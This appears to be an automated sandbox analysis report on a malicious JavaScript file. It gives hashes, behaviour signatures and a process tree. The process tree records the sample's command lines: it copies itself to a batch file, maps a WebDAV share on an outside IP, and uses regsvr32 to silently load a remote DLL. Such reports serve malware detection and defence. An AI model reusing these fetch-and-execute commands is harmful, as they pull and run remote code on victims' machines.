Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
10-07-2024 01:22
Static task
static1
Behavioral task
behavioral1
Sample
3a1a4f30292ac62adb0ba6fc888d62d2c509bc18ee0d9488cbfaf314177bca48.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
3a1a4f30292ac62adb0ba6fc888d62d2c509bc18ee0d9488cbfaf314177bca48.js
Resource
win10v2004-20240704-en
General
-
Target
3a1a4f30292ac62adb0ba6fc888d62d2c509bc18ee0d9488cbfaf314177bca48.js
-
Size
5KB
-
MD5
5f883c8c349f5f9e1c8e266556a824ea
-
SHA1
e01b1513d233bb129de3aecccd75de983ebcee89
-
SHA256
3a1a4f30292ac62adb0ba6fc888d62d2c509bc18ee0d9488cbfaf314177bca48
-
SHA512
5d31a94d7fd91788cf5e776e7f5c7e6bf9fb45d300c60ff1fa507ef2fe6d7a34c9eeda01f315cf9e4de71da10563e43c7e6c5bf5e1c2916f0fc7365b01d908bf
-
SSDEEP
96:zs8vxbHhHTF0Vnpditsd6ZRXKMQTVrukkv:hNHhzi1viid6nXVQTVrpkv
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2676 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3056 wrote to memory of 2912 3056 wscript.exe 30 PID 3056 wrote to memory of 2912 3056 wscript.exe 30 PID 3056 wrote to memory of 2912 3056 wscript.exe 30 PID 2912 wrote to memory of 2712 2912 cmd.exe 32 PID 2912 wrote to memory of 2712 2912 cmd.exe 32 PID 2912 wrote to memory of 2712 2912 cmd.exe 32 PID 2912 wrote to memory of 2676 2912 cmd.exe 33 PID 2912 wrote to memory of 2676 2912 cmd.exe 33 PID 2912 wrote to memory of 2676 2912 cmd.exe 33 PID 2912 wrote to memory of 2676 2912 cmd.exe 33 PID 2912 wrote to memory of 2676 2912 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\3a1a4f30292ac62adb0ba6fc888d62d2c509bc18ee0d9488cbfaf314177bca48.js1⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\3a1a4f30292ac62adb0ba6fc888d62d2c509bc18ee0d9488cbfaf314177bca48.js" "C:\Users\Admin\\xeiypl.bat" && "C:\Users\Admin\\xeiypl.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2712
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\502.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2676
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD55f883c8c349f5f9e1c8e266556a824ea
SHA1e01b1513d233bb129de3aecccd75de983ebcee89
SHA2563a1a4f30292ac62adb0ba6fc888d62d2c509bc18ee0d9488cbfaf314177bca48
SHA5125d31a94d7fd91788cf5e776e7f5c7e6bf9fb45d300c60ff1fa507ef2fe6d7a34c9eeda01f315cf9e4de71da10563e43c7e6c5bf5e1c2916f0fc7365b01d908bf